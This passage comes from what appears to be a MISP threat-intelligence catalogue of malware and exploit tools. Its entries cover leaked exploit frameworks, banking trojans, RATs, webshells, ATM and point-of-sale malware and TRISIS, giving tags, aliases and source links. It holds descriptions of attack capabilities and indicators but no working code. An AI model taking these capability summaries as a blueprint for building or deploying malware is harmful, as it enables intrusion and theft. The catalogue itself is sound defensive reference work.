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ECLIPSEDWING

RCE exploit for the Server service in Windows Server 2008 and later (MS08-067)

The tag is: `misp-galaxy:tool="ECLIPSEDWING"`

Table 6481. Table References

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ETRE

exploit for IMail 8.10 to 8.22
The tag is: *misp-galaxy:tool=*"ETRE"

*Table 6482. Table References*

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**FUZZBUNCH**

an exploit framework, similar to MetaSploit

The tag is: *misp-galaxy:tool=*"FUZZBUNCH"

*Table 6483. Table References*

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<tr>
<td><a href="https://securelist.com/darkpulsar/88199/">https://securelist.com/darkpulsar/88199/</a></td>
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**ODDJOB**

implant builder and C&C server that can deliver exploits for Windows 2000 and later, also not detected by any AV vendors

The tag is: *misp-galaxy:tool=*"ODDJOB"

*Table 6484. Table References*

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**PASSFREELY**

utility which Bypasses authentication for Oracle servers

The tag is: *misp-galaxy:tool=*"PASSFREELY"

*Table 6485. Table References*

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**SMBTOUCH**

check if the target is vulnerable to samba exploits like ETERNALSYNERGY, ETERNALBLUE, ETERNALROMANCE

The tag is: *misp-galaxy:tool=*"SMBTOUCH"
**ERRATICGOPHERTOUCH**

Check if the target is running some RPC

The tag is: `misp-galaxy:tool="ERRATICGOPHERTOUCH"`

**IISTOUCH**

check if the running IIS version is vulnerable

The tag is: `misp-galaxy:tool="IISTOUCH"`

**RPCOUTCH**

get info about windows via RPC

The tag is: `misp-galaxy:tool="RPCOUTCH"`

**DOPU**

used to connect to machines exploited by ETERNALCHAMPIONS

The tag is: `misp-galaxy:tool="DOPU"`
**FlexSpy**

covert surveillance tools

The tag is: `misp-galaxy:tool="FlexSpy"

**feodo**

Unfortunately, it is time to meet 'Feodo'. Since august of this year when FireEye's MPS devices detected this malware in the field, we have been monitoring this banking trojan very closely. In many ways, this malware looks similar to other famous banking trojans like Zbot and SpyEye. Although my analysis says that this malware is not a toolkit and is in the hands of a single criminal group.

The tag is: `misp-galaxy:tool="feodo"

**Cardinal RAT**

Palo Alto Networks has discovered a previously unknown remote access Trojan (RAT) that has been active for over two years. It has a very low volume in this two-year period, totaling roughly 27 total samples. The malware is delivered via an innovative and unique technique: a downloader we are calling Carp uses malicious macros in Microsoft Excel documents to compile embedded C# (C Sharp) Programming Language source code into an executable that in turn is run to deploy the Cardinal RAT malware family. These malicious Excel files use a number of different lures, providing evidence of what attackers are using to entice victims into executing them.

The tag is: `misp-galaxy:tool="Cardinal RAT"

Cardinal RAT has relationships with:

- similar: `misp-galaxy:tool="EVILNUM" with estimative-language:likelihood-probability="likely"

**REDLEAVES**

The REDLEAVES implant consists of three parts: an executable, a loader, and the implant shellcode. The REDLEAVES implant is a remote administration Trojan (RAT) that is built in Visual C++ and makes heavy use of thread generation during its execution. The implant contains a number of functions typical of RATs, including system enumeration and creating a remote shell back to the C2.
Kazuar

Kazuar is a fully featured backdoor written using the .NET Framework and obfuscated using the open source packer called ConfuserEx. Unit 42 researchers have uncovered a backdoor Trojan used in an espionage campaign. The developers refer to this tool by the name Kazuar, which is a Trojan written using the Microsoft .NET Framework that offers actors complete access to compromised systems targeted by its operator. Kazuar includes a highly functional command set, which includes the ability to remotely load additional plugins to increase the Trojan's capabilities. During our analysis of this malware we uncovered interesting code paths and other artifacts that may indicate a Mac or Unix variant of this same tool also exists. Also, we discovered a unique feature within Kazuar: it exposes its capabilities through an Application Programming Interface (API) to a built-in webserver. We suspect the Kazuar tool may be linked to the Turla threat actor group (also known as Uroburos and Snake), who have been reported to have compromised embassies, defense contractors, educational institutions, and research organizations across the globe. A hallmark of Turla operations is iterations of their tools and code lineage in Kazuar can be traced back to at least 2005. If the hypothesis is correct and the Turla threat group is using Kazuar, we believe they may be using it as a replacement for Carbon and its derivatives. Of the myriad of tools observed in use by Turla Carbon and its variants were typically deployed as a second stage backdoor within targeted environments and we believe Kazuar may now hold a similar role for Turla operations.

The tag is: *misp-galaxy:tool*="Kazuar"

Kazuar has relationships with:

- similar: *misp-galaxy:malpedia*="Kazuar" with *estimative-language:likelihood-probability*="likely"

Trick Bot

Many links indicate, that this bot is another product of the people previously involved in Dyreza. It seems to be rewritten from scratch – however, it contains many similar features and solutions to those we encountered analyzing Dyreza (read more).

The tag is: *misp-galaxy:tool*="Trick Bot"

Trick Bot is also known as:
- TrickBot
- TrickLoader

Trick Bot has relationships with:

- similar: misp-galaxy:malpedia="TrickBot" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:banker="Trickbot" with estimative-language:likelihood-probability="likely"

Table 6495. Table References

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<tr>
<td><a href="https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/">https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/</a></td>
</tr>
<tr>
<td><a href="https://blog.fraudwatchinternational.com/malware/trickbot-malware-works">https://blog.fraudwatchinternational.com/malware/trickbot-malware-works</a></td>
</tr>
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</table>

**Hackshit**

Netskope Threat Research Labs recently discovered a Phishing-as-a-Service (PhaaS) platform named Hackshit, that records the credentials of the phished bait victims. The phished bait pages are packaged with base64 encoding and served from secure (HTTPS) websites with “.moe” top level domain (TLD) to evade traditional scanners. “.moe” TLD is intended for the purpose of ‘The marketing of products or services deemed’. The victim’s credentials are sent to the Hackshit PhaaS platform via websockets. The Netskope Active Platform can proactively protect customers by creating custom applications and a policy to block all the activities related to Hackshit PhaaS.

The tag is: misp-galaxy:tool="Hackshit"

Table 6496. Table References

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<tr>
<td><a href="https://resources.netskope.com/h/i/352356475-phishing-as-a-service-phishing-revamped">https://resources.netskope.com/h/i/352356475-phishing-as-a-service-phishing-revamped</a></td>
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</table>

**Moneygram Adwind**

The tag is: misp-galaxy:tool="Moneygram Adwind"

Table 6497. Table References

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<tr>
<td><a href="https://myonlinesecurity.co.uk/new-guidelines-from-moneygram-malspam-delivers-a-brand-new-java-adwind-version/">https://myonlinesecurity.co.uk/new-guidelines-from-moneygram-malspam-delivers-a-brand-new-java-adwind-version/</a></td>
</tr>
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</table>
Banload

Banload has been around since the last decade. This malware generally arrives on a victim's system through a spam email containing an archived file or bundled software as an attachment. In a few cases, this malware may also be dropped by other malware or a drive-by download. When executed, Banload downloads other malware, often banking Trojans, on the victim's system to carry out further infections.

The tag is: misp-galaxy:tool="Banload"

Table 6498. Table References

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Smoke Loader

This small application is used to download other malware. What makes the bot interesting are various tricks that it uses for deception and self protection.

The tag is: misp-galaxy:tool="Smoke Loader"

Smoke Loader is also known as:

- SmokeLoader

Smoke Loader has relationships with:

- similar: misp-galaxy:mitre-malware="Smoke Loader - S0226" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="SmokeLoader" with estimative-language:likelihood-probability="likely"

Table 6499. Table References

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</table>
**LockPoS**

The analyzed sample has a recent compilation date (2017-06-24) and is available on VirusTotal. It starts out by resolving several Windows functions using API hashing (CRC32 is used as the hashing function).

The tag is: `misp-galaxy:tool="LockPoS"`

**Table 6500. Table References**

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<tbody>
<tr>
<td><a href="https://www.arbornetworks.com/blog/asert/lockpos-joins-flock/">https://www.arbornetworks.com/blog/asert/lockpos-joins-flock/</a></td>
</tr>
</tbody>
</table>

**Fadok**

Win.Worm.Fadok drops several files. `%AppData%\RAC\mls.exe` or `%AppData%\RAC\svcsc.exe` are instances of the malware which are auto-started when Windows starts. Further, the worm drops and opens a Word document. It connects to the domain wxanalytics[.]ru.

The tag is: `misp-galaxy:tool="Fadok"`

Fadok is also known as:

- Win32/Fadok

**Table 6501. Table References**

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<tr>
<td><a href="http://blog.talosintelligence.com/2017/06/threat-roundup-0602-0609.html">http://blog.talosintelligence.com/2017/06/threat-roundup-0602-0609.html</a></td>
</tr>
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</table>

**Loki Bot**

Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.

The tag is: `misp-galaxy:tool="Loki Bot"`

**Table 6502. Table References**

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<tr>
<td><a href="https://phishme.com/loki-bot-malware/">https://phishme.com/loki-bot-malware/</a></td>
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</table>
KONNI

Talos has discovered an unknown Remote Administration Tool that we believe has been in use for over 3 years. During this time it has managed to avoid scrutiny by the security community. The current version of the malware allows the operator to steal files, keystrokes, perform screenshots, and execute arbitrary code on the infected host. Talos has named this malware KONNI. Throughout the multiple campaigns observed over the last 3 years, the actor has used an email attachment as the initial infection vector. They then use additional social engineering to prompt the target to open a .scr file, display a decoy document to the users, and finally execute the malware on the victim's machine. The malware infrastructure of the analysed samples was hosted by a free web hosting provider: 000webhost. The malware has evolved over time. In this article, we will analyse this evolution:

The tag is: misp-galaxy:tool="KONNI"

KONNI has relationships with:

- similar: misp-galaxy:rat="Konni" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="Konni" with estimative-language:likelihood-probability="likely"

**Table 6503. Table References**

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<tr>
<td><a href="http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html">http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html</a></td>
</tr>
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</table>

NOKKI

Beginning in early 2018, Unit 42 observed a series of attacks using a previously unreported malware family, which we have named ‘NOKKI’. The malware in question has ties to a previously reported malware family named KONNI, however, after careful consideration, we believe enough differences are present to introduce a different malware family name. To reflect the close relationship with KONNI, we chose NOKKI, swapping KONNI’s Ns and Ks. Because of code overlap found within both malware families, as well as infrastructure overlap, we believe the threat actors responsible for KONNI are very likely also responsible for NOKKI. Previous reports stated it was likely KONNI had been in use for over three years in multiple campaigns with a heavy interest in the Korean peninsula and surrounding areas. As of this writing, it is not certain if the KONNI or NOKKI operators are related to known adversary groups operating in the regions of interest, although there is evidence of a tenuous relationship with a group known as Reaper.

The tag is: misp-galaxy:tool="NOKKI"

**Table 6504. Table References**

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SpyDealer

Recently, Palo Alto Networks researchers discovered an advanced Android malware we've named “SpyDealer” which exfiltrates private data from more than 40 apps and steals sensitive messages from communication apps by abusing the Android accessibility service feature. SpyDealer uses exploits from a commercial rooting app to gain root privilege, which enables the subsequent data theft.

The tag is: \textit{misp-galaxy:tool="SpyDealer"}

Table 6505. Table References

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CowerSnail

CowerSnail was compiled using Qt and linked with various libraries. This framework provides benefits such as cross-platform capability and transferability of the source code between different operating systems.

The tag is: \textit{misp-galaxy:tool="CowerSnail"}

Table 6506. Table References

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Svpeng

In mid-July 2017, we found a new modification of the well-known mobile banking malware family Svpeng – Trojan-Banker.AndroidOS.Svpeng.ae. In this modification, the cybercriminals have added new functionality: it now also works as a keylogger, stealing entered text through the use of accessibility services.

The tag is: \textit{misp-galaxy:tool="Svpeng"}

Svpeng is also known as:

- trojan-banker.androidos.svpeng.ae

Svpeng has relationships with:

- similar: misp-galaxy:android="Svpeng" with estimative-language:likelihood-probability="likely"
TwoFace

While investigating a recent security incident, Unit 42 found a webshell that we believe was used by the threat actor to remotely access the network of a targeted Middle Eastern organization. The construction of the webshell was interesting by itself, as it was actually two separate webshells: an initial webshell that was responsible for saving and loading the second fully functional webshell. It is this second webshell that enabled the threat actor to run a variety of commands on the compromised server. Due to these two layers, we use the name TwoFace to track this webshell. During our analysis, we extracted the commands executed by the TwoFace webshell from the server logs on the compromised server. Our analysis shows that the commands issued by the threat actor date back to June 2016; this suggests that the actor had access to this shell for almost an entire year. The commands issued show the actor was interested in gathering credentials from the compromised server using the Mimikatz tool. We also saw the attacker using the TwoFace webshell to move laterally through the network by copying itself and other webshells to other servers.

The tag is: misp-galaxy:tool="TwoFace"

IntrudingDivisor

Like TwoFace, the IntrudingDivisor webshell requires the threat actor to authenticate before issuing commands. To authenticate, the actor must provide two pieces of information, first an integer that is divisible by 5473 and a string whose MD5 hash is "9A26A0E7B88940DA84FC4D5E6C61AD0". Upon successful authentication, the webshell has a command handler that uses integers within the request to determine the command to execute. To complete

The tag is: misp-galaxy:tool="IntrudingDivisor"
**JS_POWMET**

Attacks that use completely fileless malware are a rare occurrence, so we thought it important to discuss a new trojan known as JS_POWMET (Detected by Trend Micro as JS_POWMET.DE), which arrives via an autostart registry procedure. By utilizing a completely fileless infection chain, the malware will be more difficult to analyze using a sandbox, making it more difficult for anti-malware engineers to examine.

The tag is: *misp-galaxy:tool="JS_POWMET"

**Table 6510. Table References**

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**EngineBox Malware**

The main malware capabilities include a privilege escalation attempt using MS16–032 exploitation; a HTTP Proxy to intercept banking transactions; a backdoor to make it possible for the attacker to issue arbitrary remote commands and a C&C through a IRC channel. As it's being identified as a Generic Trojan by most of VirusTotal (VT) engines, let's name it EngineBox— the core malware class I saw after reverse engineering it.

The tag is: *misp-galaxy:tool="EngineBox Malware"

**Table 6511. Table References**

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<tr>
<td><a href="https://isc.sans.edu/diary/22736">https://isc.sans.edu/diary/22736</a></td>
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**Joao**

Spread via hacked Aeria games offered on unofficial websites, the modular malware can download and install virtually any other malicious code on the victim’s computer. To spread their malware, the attackers behind Joao have misused massively-multiplayer online role-playing games (MMORPGs) originally published by Aeria Games. At the time of writing this article, the Joao downloader was being distributed via the anime-themed MMORPG Grand Fantasia offered on gf.ignitgames[.]to.

The tag is: *misp-galaxy:tool="Joao"

Joao has relationships with:

- similar: misp-galaxy:malpedia="Joao" with estimative-language:likelihood-probability="likely"

**Table 6512. Table References**

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Fireball

Upon execution, Fireball installs a browser hijacker as well as any number of adware programs. Several different sources have linked different indicators of compromise (IOCs) and varied payloads, but a few details remain the same.

The tag is: misp-galaxy:tool="Fireball"

Fireball has relationships with:

• similar: misp-galaxy:malpedia="Fireball" with estimative-language:likelihood-probability="likely"

Table 6513. Table References

Links

https://www.cylance.com/en_us/blog/threat-spotlight-is-fireball-adware-or-malware.html

ShadowPad

ShadowPad is a modular cyber-attack platform that attackers deploy in victim networks to gain flexible remote control capabilities. The platform is designed to run in two stages. The first stage is a shellcode that was embedded in a legitimate nssock2.dll used by Xshell, Xmanager and other software packages produced by NetSarang. This stage is responsible for connecting to “validation” command and control (C&C) servers and getting configuration information including the location of the real C&C server, which may be unique per victim. The second stage acts as an orchestrator for five main modules responsible for C&C communication, working with the DNS protocol, loading and injecting additional plugins into the memory of other processes.

The tag is: misp-galaxy:tool="ShadowPad"

ShadowPad is also known as:

• POISONPLUG
• Barlaiy

ShadowPad has relationships with:

• similar: misp-galaxy:malpedia="ShadowPad" with estimative-language:likelihood-probability="likely"

Table 6514. Table References

Links

IoT_reaper

IoT_reaper is fairly large now and is actively expanding. For example, there are multiple C2s we are tracking, the most recently data (October 19) from just one C2 shows the number of unique active bot IP address is more than 10k per day. While at the same time, there are millions of potential vulnerable device IPs being queued into the c2 system waiting to be processed by an automatic loader that injects malicious code to the devices to expand the size of the botnet.

The tag is: misp-galaxy:tool="IoT_reaper"

Table 6515. Table References

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FormBook

FormBook is a data stealer and form grabber that has been advertised in various hacking forums since early 2016.

The tag is: misp-galaxy:tool="FormBook"

Table 6516. Table References

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<tr>
<td><a href="https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/">https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/</a></td>
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Dimnie

Dimnie, the commonly agreed upon name for the binary dropped by the PowerShell script above, has been around for several years. Palo Alto Networks has observed samples dating back to early 2014 with identical command and control mechanisms. The malware family serves as a downloader and has a modular design encompassing various information stealing functionalities. Each module is injected into the memory of core Windows processes, further complicating analysis. During its lifespan, it appears to have undergone few changes and its stealthy command and control methods combined with a previously Russian focused target base has allowed it to fly under the radar up until this most recent campaign.

The tag is: misp-galaxy:tool="Dimnie"

Dimnie has relationships with:

- similar: misp-galaxy:malpedia="Dimnie" with estimative-language:likelihood-probability="likely"

Table 6517. Table References
ALMA Communicator

The ALMA Communicator Trojan is a backdoor Trojan that uses DNS tunneling exclusively to receive commands from the adversary and to exfiltrate data. This Trojan specifically reads in a configuration from the cfg file that was initially created by the Clayslide delivery document. ALMA does not have an internal configuration, so the Trojan does not function without the cfg file created by the delivery document.

The tag is: misp-galaxy:tool="ALMA Communicator"

Silence

In September 2017, we discovered a new targeted attack on financial institutions. Victims are mostly Russian banks but we also found infected organizations in Malaysia and Armenia. The attackers were using a known but still very effective technique for cybercriminals looking to make money: gaining persistent access to an internal banking network for a long period of time, making video recordings of the day to day activity on bank employees' PCs, learning how things works in their target banks, what software is being used, and then using that knowledge to steal as much money as possible when ready. We saw that technique before in Carbanak, and other similar cases worldwide. The infection vector is a spear-phishing email with a malicious attachment. An interesting point in the Silence attack is that the cybercriminals had already compromised banking infrastructure in order to send their spear-phishing emails from the addresses of real bank employees and look as unsuspicious as possible to future victims.

The tag is: misp-galaxy:tool="Silence"

Silence has relationships with:

- similar: misp-galaxy:malpedia="Silence" with estimative-language:likelihood-probability="likely"
Volgmer

Volgmer is a backdoor Trojan designed to provide covert access to a compromised system. Since at least 2013, HIDDEN COBRA actors have been observed using Volgmer malware in the wild to target the government, financial, automotive, and media industries. It is suspected that spear phishing is the primary delivery mechanism for Volgmer infections; however, HIDDEN COBRA actors use a suite of custom tools, some of which could also be used to initially compromise a system. Therefore, it is possible that additional HIDDEN COBRA malware may be present on network infrastructure compromised with Volgmer.

The tag is: `misp-galaxy:tool="Volgmer"`

Volgmer has relationships with:

- similar: `misp-galaxy:mitre-malware="Volgmer - S0180"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:rat="FALLCHILL"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:mitre-malware="FALLCHILL - S0181"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:malpedia="Volgmer"` with `estimative-language:likelihood-probability="likely"

Table 6520. Table References

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<tr>
<td><a href="https://www.us-cert.gov/ncas/alerts/TA17-318B">https://www.us-cert.gov/ncas/alerts/TA17-318B</a></td>
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Nymaim

Nymaim is a 2-year-old strain of malware most closely associated with ransomware. We have seen recent attacks spreading it using an established email marketing service provider to avoid blacklists and detection tools. But instead of ransomware, the malware is now being used to distribute banking Trojans.

The tag is: `misp-galaxy:tool="Nymaim"`

Nymaim has relationships with:

- similar: `misp-galaxy:malpedia="Nymaim"` with `estimative-language:likelihood-probability="likely"

Table 6521. Table References

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GootKit

As was the case earlier, the bot Gootkit is written in NodeJS, and is downloaded to a victim computer via a chain of downloaders. The main purpose of the bot also remained the same – to steal banking data. The new Gootkit version, detected in September, primarily targets clients of European banks, including those in Germany, France, Italy, the Netherlands, Poland, etc.

The tag is: misp-galaxy:tool="GootKit"

GootKit is also known as:

• Gootkit

GootKit has relationships with:

• similar: misp-galaxy:malpedia="GootKit" with estimative-language:likelihood-probability="likely"

Table 6522. Table References

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<tr>
<td><a href="https://securelist.com/inside-the-gootkit-cc-server/76433/">https://securelist.com/inside-the-gootkit-cc-server/76433/</a></td>
</tr>
</tbody>
</table>

Agent Tesla

Agent Tesla is modern powerful keystroke logger. It provides monitoring your personnel computer via keyboard and screenshot. Keyboard, screenshot and registered passwords are sent in log. You can receive your logs via e-mail, ftp or php(web panel).

The tag is: misp-galaxy:tool="Agent Tesla"

Agent Tesla has relationships with:

• similar: misp-galaxy:malpedia="Agent Tesla" with estimative-language:likelihood-probability="likely"

Table 6523. Table References

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<tr>
<td><a href="https://www.agenttesla.com/">https://www.agenttesla.com/</a></td>
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</table>
**Ordinypt**

A new ransomware strain called Ordinypt is currently targeting victims in Germany, but instead of encrypting users' documents, the ransomware rewrites files with random data. Ordinypt is actually a wiper and not ransomware because it does not bother encrypting anything, but just replaces files with random data.

The tag is: *misp-galaxy:tool="Ordinypt"*

Ordinypt is also known as:

- **HSDFSDCrypt**

Ordinypt has relationships with:

- similar: *misp-galaxy:malpedia="Ordinypt"* with *estimative-language:likelihood-probability="likely"

**StrongPity2**

Detected by ESET as Win32/StrongPity2, this spyware notably resembles one that was attributed to the group called StrongPity.

The tag is: *misp-galaxy:tool="StrongPity2"*

StrongPity2 is also known as:

- **Win32/StrongPity2**

**wp-vcd**

WordPress site owners should be on the lookout for a malware strain tracked as wp-vcd that hides in legitimate WordPress files and that is used to add a secret admin user and grant attackers control over infected sites. The malware was first spotted online over the summer by Italian security researcher Manuel D'Orso. The initial version of this threat was loaded via an include call for the wp-vcd.php file —hence the malware's name— and injected malicious code into WordPress core files such as functions.php and class.wp.php. This was not a massive campaign, but attacks continued throughout the recent months.
MoneyTaker 5.0

Malicious program for auto replacement of payment data in AWS CBR

Quant Loader

Described as a "professional exe loader / dll dropper" Quant Loader is in fact a very basic trojan downloader. It began being advertised on September 1, 2016 on various Russian underground forums.

SSHDoor

The Secure Shell Protocol (SSH) is a very popular protocol used for secure data communication. It is widely used in the Unix world to manage remote servers, transfer files, etc. The modified SSH
daemon described here, Linux/SSHDoor.A, is designed to steal usernames and passwords and allows remote access to the server via either an hardcoded password or SSH key.

The tag is: `misp-galaxy:tool="SSHDoor"`

SSHDoor has relationships with:

- similar: `misp-galaxy:malpedia="SSHDoor"` with `estimative-language:likelihood-probability="likely"`

---

**TRISIS**

(Dragos Inc.) The team identifies this malware as TRISIS because it targets Schneider Electric's Triconex safety instrumented system (SIS) enabling the replacement of logic in final control elements. TRISIS is highly targeted and likely does not pose an immediate threat to other Schneider Electric customers, let alone other SIS products. (FireEye Inc.) This malware, which we call TRITON, is an attack framework built to interact with Triconex Safety Instrumented System (SIS) controllers. We have not attributed the incident to a threat actor, though we believe the activity is consistent with a nation state preparing for an attack. TRITON is one of a limited number of publicly identified malicious software families targeted at industrial control systems (ICS). It follows Stuxnet which was used against Iran in 2010 and Industroyer which we believe was deployed by Sandworm Team against Ukraine in 2016.

The tag is: `misp-galaxy:tool="TRISIS"`

TRISIS is also known as:

- TRITON

---

**OSX.Pirrit**

macOS adware strain

The tag is: `misp-galaxy:tool="OSX.Pirrit"`

OSX.Pirrit is also known as:
GratefulPOS

GratefulPOS has the following functions:
1. Access arbitrary processes on the target POS system
2. Scrape track 1 and 2 payment card data from the process(es)
3. Exfiltrate the payment card data via lengthy encoded and obfuscated DNS queries to a hardcoded domain registered and controlled by the perpetrators, similar to that described by Paul Rascagneres in his analysis of FrameworkPOS in 2014[iii], and more recently by Luis Mendieta of Anomoli in analysis of a precursor to this sample.

The tag is: *misp-galaxy:tool="GratefulPOS"

GratefulPOS has relationships with:

- similar: *misp-galaxy:banker="GratefulPOS" with estimative-language:likelihood-probability="likely"

PRILEX

Prilex malware steals the information of the infected ATM’s users. In this case, it was a Brazilian bank, but consider the implications of such an attack in your region, whether you’re a customer or the bank.

The tag is: *misp-galaxy:tool="PRILEX"

Table 6532. Table References

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Table 6533. Table References

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CUTLET MAKER

Cutlet Maker is an ATM malware designed to empty the machine of all its banknotes. Interestingly, while its authors have been advertising its sale, their competitors have already cracked the program, allowing anybody to use it for free.

The tag is: misp-galaxy:tool="CUTLET MAKER"

Table 6534. Table References

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Satori

According to a report Li shared with Bleeping Computer today, the Mirai Satori variant is quite different from all previous pure Mirai variants. Previous Mirai versions infected IoT devices and then downloaded a Telnet scanner component that attempted to find other victims and infect them with the Mirai bot. The Satori variant does not use a scanner but uses two embedded exploits that will try to connect to remote devices on ports 37215 and 52869. Effectively, this makes Satori an IoT worm, being able to spread by itself without the need for separate components.

The tag is: misp-galaxy:tool="Satori"

Satori is also known as:

• Okiru

Satori has relationships with:

• similar: misp-galaxy:botnet="Satori" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:malpedia="Satori" with estimative-language:likelihood-probability="likely"

Table 6535. Table References

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<tbody>
<tr>
<td><a href="https://blog.fortinet.com/2017/12/12/rise-of-one-more-mirai-worm-variant">https://blog.fortinet.com/2017/12/12/rise-of-one-more-mirai-worm-variant</a></td>
</tr>
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</table>

PowerSpritz

PowerSpritz is a Windows executable that hides both its legitimate payload and malicious PowerShell command using a non-standard implementation of the already rarely used Spritz encryption algorithm (see the Attribution section for additional analysis of the Spritz implementation). This malicious downloader has been observed being delivered via spearphishing attacks using the TinyCC link shortener service to redirect to likely attacker-controlled servers.
hosting the malicious PowerSpritz payload.

The tag is: *misp-galaxy:tool="PowerSpritz"

Table 6536. Table References

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**PowerRatankba**

PowerRatankba is used for the same purpose as Ratankba: as a first stage reconnaissance tool and for the deployment of further stage implants on targets that are deemed interesting by the actor. Similar to its predecessor, PowerRatankba utilizes HTTP for its C&C communication.

The tag is: *misp-galaxy:tool="PowerRatankba"

PowerRatankba has relationships with:

- similar: *misp-galaxy:malpedia="PowerRatankba" with estimative-language:likelihood-probability="likely"

Table 6537. Table References

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**Ratankba**

In one instance we observed, one of the initial malware delivered to the victim, RATANKBA, connects to a legitimate but compromised website from which a hack tool (nbt_scan.exe) is also downloaded. The domain also serves as one of the campaign’s platform for C&C communication. The threat actor uses RATANKBA to survey the lay of the land as it looks into various aspects of the host machine where it has been initially downloaded—the machine that has been victim of the watering hole attack. Information such as the running tasks, domain, shares, user information, if the host has default internet connectivity, and so forth.

The tag is: *misp-galaxy:tool="Ratankba"

Table 6538. Table References

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**USBStealer**

USBStealer serves as a network tool that extracts sensitive information from air-gapped networks. We have not seen this component since mid 2015.
The tag is: `misp-galaxy:tool="USBStealer"`

USBStealer has relationships with:

- similar: `misp-galaxy:mitre-malware="USBStealer - S0136"` with estimative-language:likelihood-probability="likely"

Table 6539. Table References

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**Downdelph**

Downdelph is a lightweight downloader developed in the Delphi programming language. As we already mentioned in our white paper, its period of activity was from November 2013 to September 2015 and there have been no new variants seen since.

The tag is: `misp-galaxy:tool="Downdelph"`

Downdelph has relationships with:

- similar: `misp-galaxy:mitre-malware="Downdelph - S0134"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:malpedia="Downdelph"` with estimative-language:likelihood-probability="likely"

Table 6540. Table References

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**CoinMiner**

Monero-mining malware

The tag is: `misp-galaxy:tool="CoinMiner"`

CoinMiner has relationships with:

- similar: `misp-galaxy:malpedia="Monero Miner"` with estimative-language:likelihood-probability="likely"

Table 6541. Table References

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**FruitFly**

A fully-featured backdoor, designed to perversely spy on Mac users

The tag is: `misp-galaxy:tool="FruitFly"`

FruitFly has relationships with:

- similar: `misp-galaxy:malpedia="FruitFly"` with `estimative-language:likelihood-probability="likely"`

*Table 6542. Table References*

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<tbody>
<tr>
<td><a href="https://objective-see.com/blog/blog_0x25.html#FruitFly">https://objective-see.com/blog/blog_0x25.html#FruitFly</a></td>
</tr>
</tbody>
</table>

**MacDownloader**

Iranian macOS exfiltration agent, targeting the 'defense industrial base' and human rights advocates.

The tag is: `misp-galaxy:tool="MacDownloader"`

MacDownloader is also known as:

- iKitten

MacDownloader has relationships with:

- similar: `misp-galaxy:malpedia="MacDownloader"` with `estimative-language:likelihood-probability="likely"`

*Table 6543. Table References*

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<tr>
<td><a href="https://objective-see.com/blog/blog_0x25.html#MacDownloader">https://objective-see.com/blog/blog_0x25.html#MacDownloader</a></td>
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</tbody>
</table>

**Empyre**

The open-source macOS backdoor, 'Empyre', maliciously packaged into a macro'd Word document

The tag is: `misp-galaxy:tool="Empyre"`

Empyre is also known as:

- Empye

*Table 6544. Table References*

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Proton

A fully-featured macOS backdoor, designed to collect and exfiltrate sensitive user data such as 1Password files, browser login data, and keychains.

The tag is: `misp-galaxy:tool="Proton"`

Mughthesec

Adware which hijacks a macOS user’s homepage to redirect search queries.

The tag is: `misp-galaxy:tool="Mughthesec"`

Mughthesec has relationships with:

- similar: `misp-galaxy:malpedia="Mughthesec"` with `estimative-language:likelihood-probability="likely"

Pwnet

A macOS crypto-currency miner, distributed via a trojaned ‘CS-GO’ hack.

The tag is: `misp-galaxy:tool="Pwnet"`

Pwnet has relationships with:

- similar: `misp-galaxy:malpedia="Pwnet"` with `estimative-language:likelihood-probability="likely"

CpuMeaner

A macOS crypto-currency mining trojan.
The tag is: `misp-galaxy:tool="CpuMeaner"`

CpuMeaner has relationships with:

- similar: `misp-galaxy:malpedia="CpuMeaner"` with `estimative-language:likelihood-probability="likely"

Table 6548. Table References

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<tr>
<td><a href="https://objective-see.com/blog/blog_0x25.html">https://objective-see.com/blog/blog_0x25.html</a></td>
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## Travle

The Travle sample found during our investigation was a DLL with a single exported function (MSOProtect). The malware name Travle was chosen given a string found in early samples of this family: “Travle Path Failed!”. This typo was replaced with correct word “Travel” in newer releases. We believe that Travle could be a successor to the NetTraveler family.

The tag is: `misp-galaxy:tool="Travle"`

Travle is also known as:

- PYLOT

Table 6549. Table References

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<tr>
<td><a href="https://securelist.com/travle-aka-pylot-backdoor-hits-russian-speaking-targets/83455/">https://securelist.com/travle-aka-pylot-backdoor-hits-russian-speaking-targets/83455/</a></td>
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## Digmine

Digmine is coded in AutoIt, and sent to would-be victims posing as a video file but is actually an AutoIt executable script. If the user's Facebook account is set to log in automatically, Digmine will manipulate Facebook Messenger in order to send a link to the file to the account's friends. The abuse of Facebook is limited to propagation for now, but it wouldn’t be implausible for attackers to hijack the Facebook account itself down the line. This functionality’s code is pushed from the command-and-control (C&C) server, which means it can be updated.

The tag is: `misp-galaxy:tool="Digmine"`

Table 6550. Table References

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**TSCookie**

TSCookie itself only serves as a downloader. It expands functionality by downloading modules from C&C servers. The sample that was examined downloaded a DLL file which has exfiltrating function among many others (hereafter “TSCookieRAT”). Downloaded modules only runs on memory.

The tag is: `misp-galaxy:tool="TSCookie`"

TSCookie has relationships with:

- similar: `misp-galaxy:malpedia="PLEAD (Windows)"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:tool="PLEAD"` with `estimative-language:likelihood-probability="likely"

**Table 6551. Table References**

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<td><a href="http://blog.jpcert.or.jp/.s/2018/03/malware-tscooki-7aa0.html">http://blog.jpcert.or.jp/.s/2018/03/malware-tscooki-7aa0.html</a></td>
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**Exforel**

Exforel backdoor malware, VirTool:WinNT/Exforel.A, backdoor implemented at the Network Driver Interface Specification (NDIS) level.

The tag is: `misp-galaxy:tool="Exforel"`

**Table 6552. Table References**

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**Rotinom**

W32.Rotinom is a worm that spreads by copying itself to removable drives.

The tag is: `misp-galaxy:tool="Rotinom"`

**Table 6553. Table References**

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**Aurora**

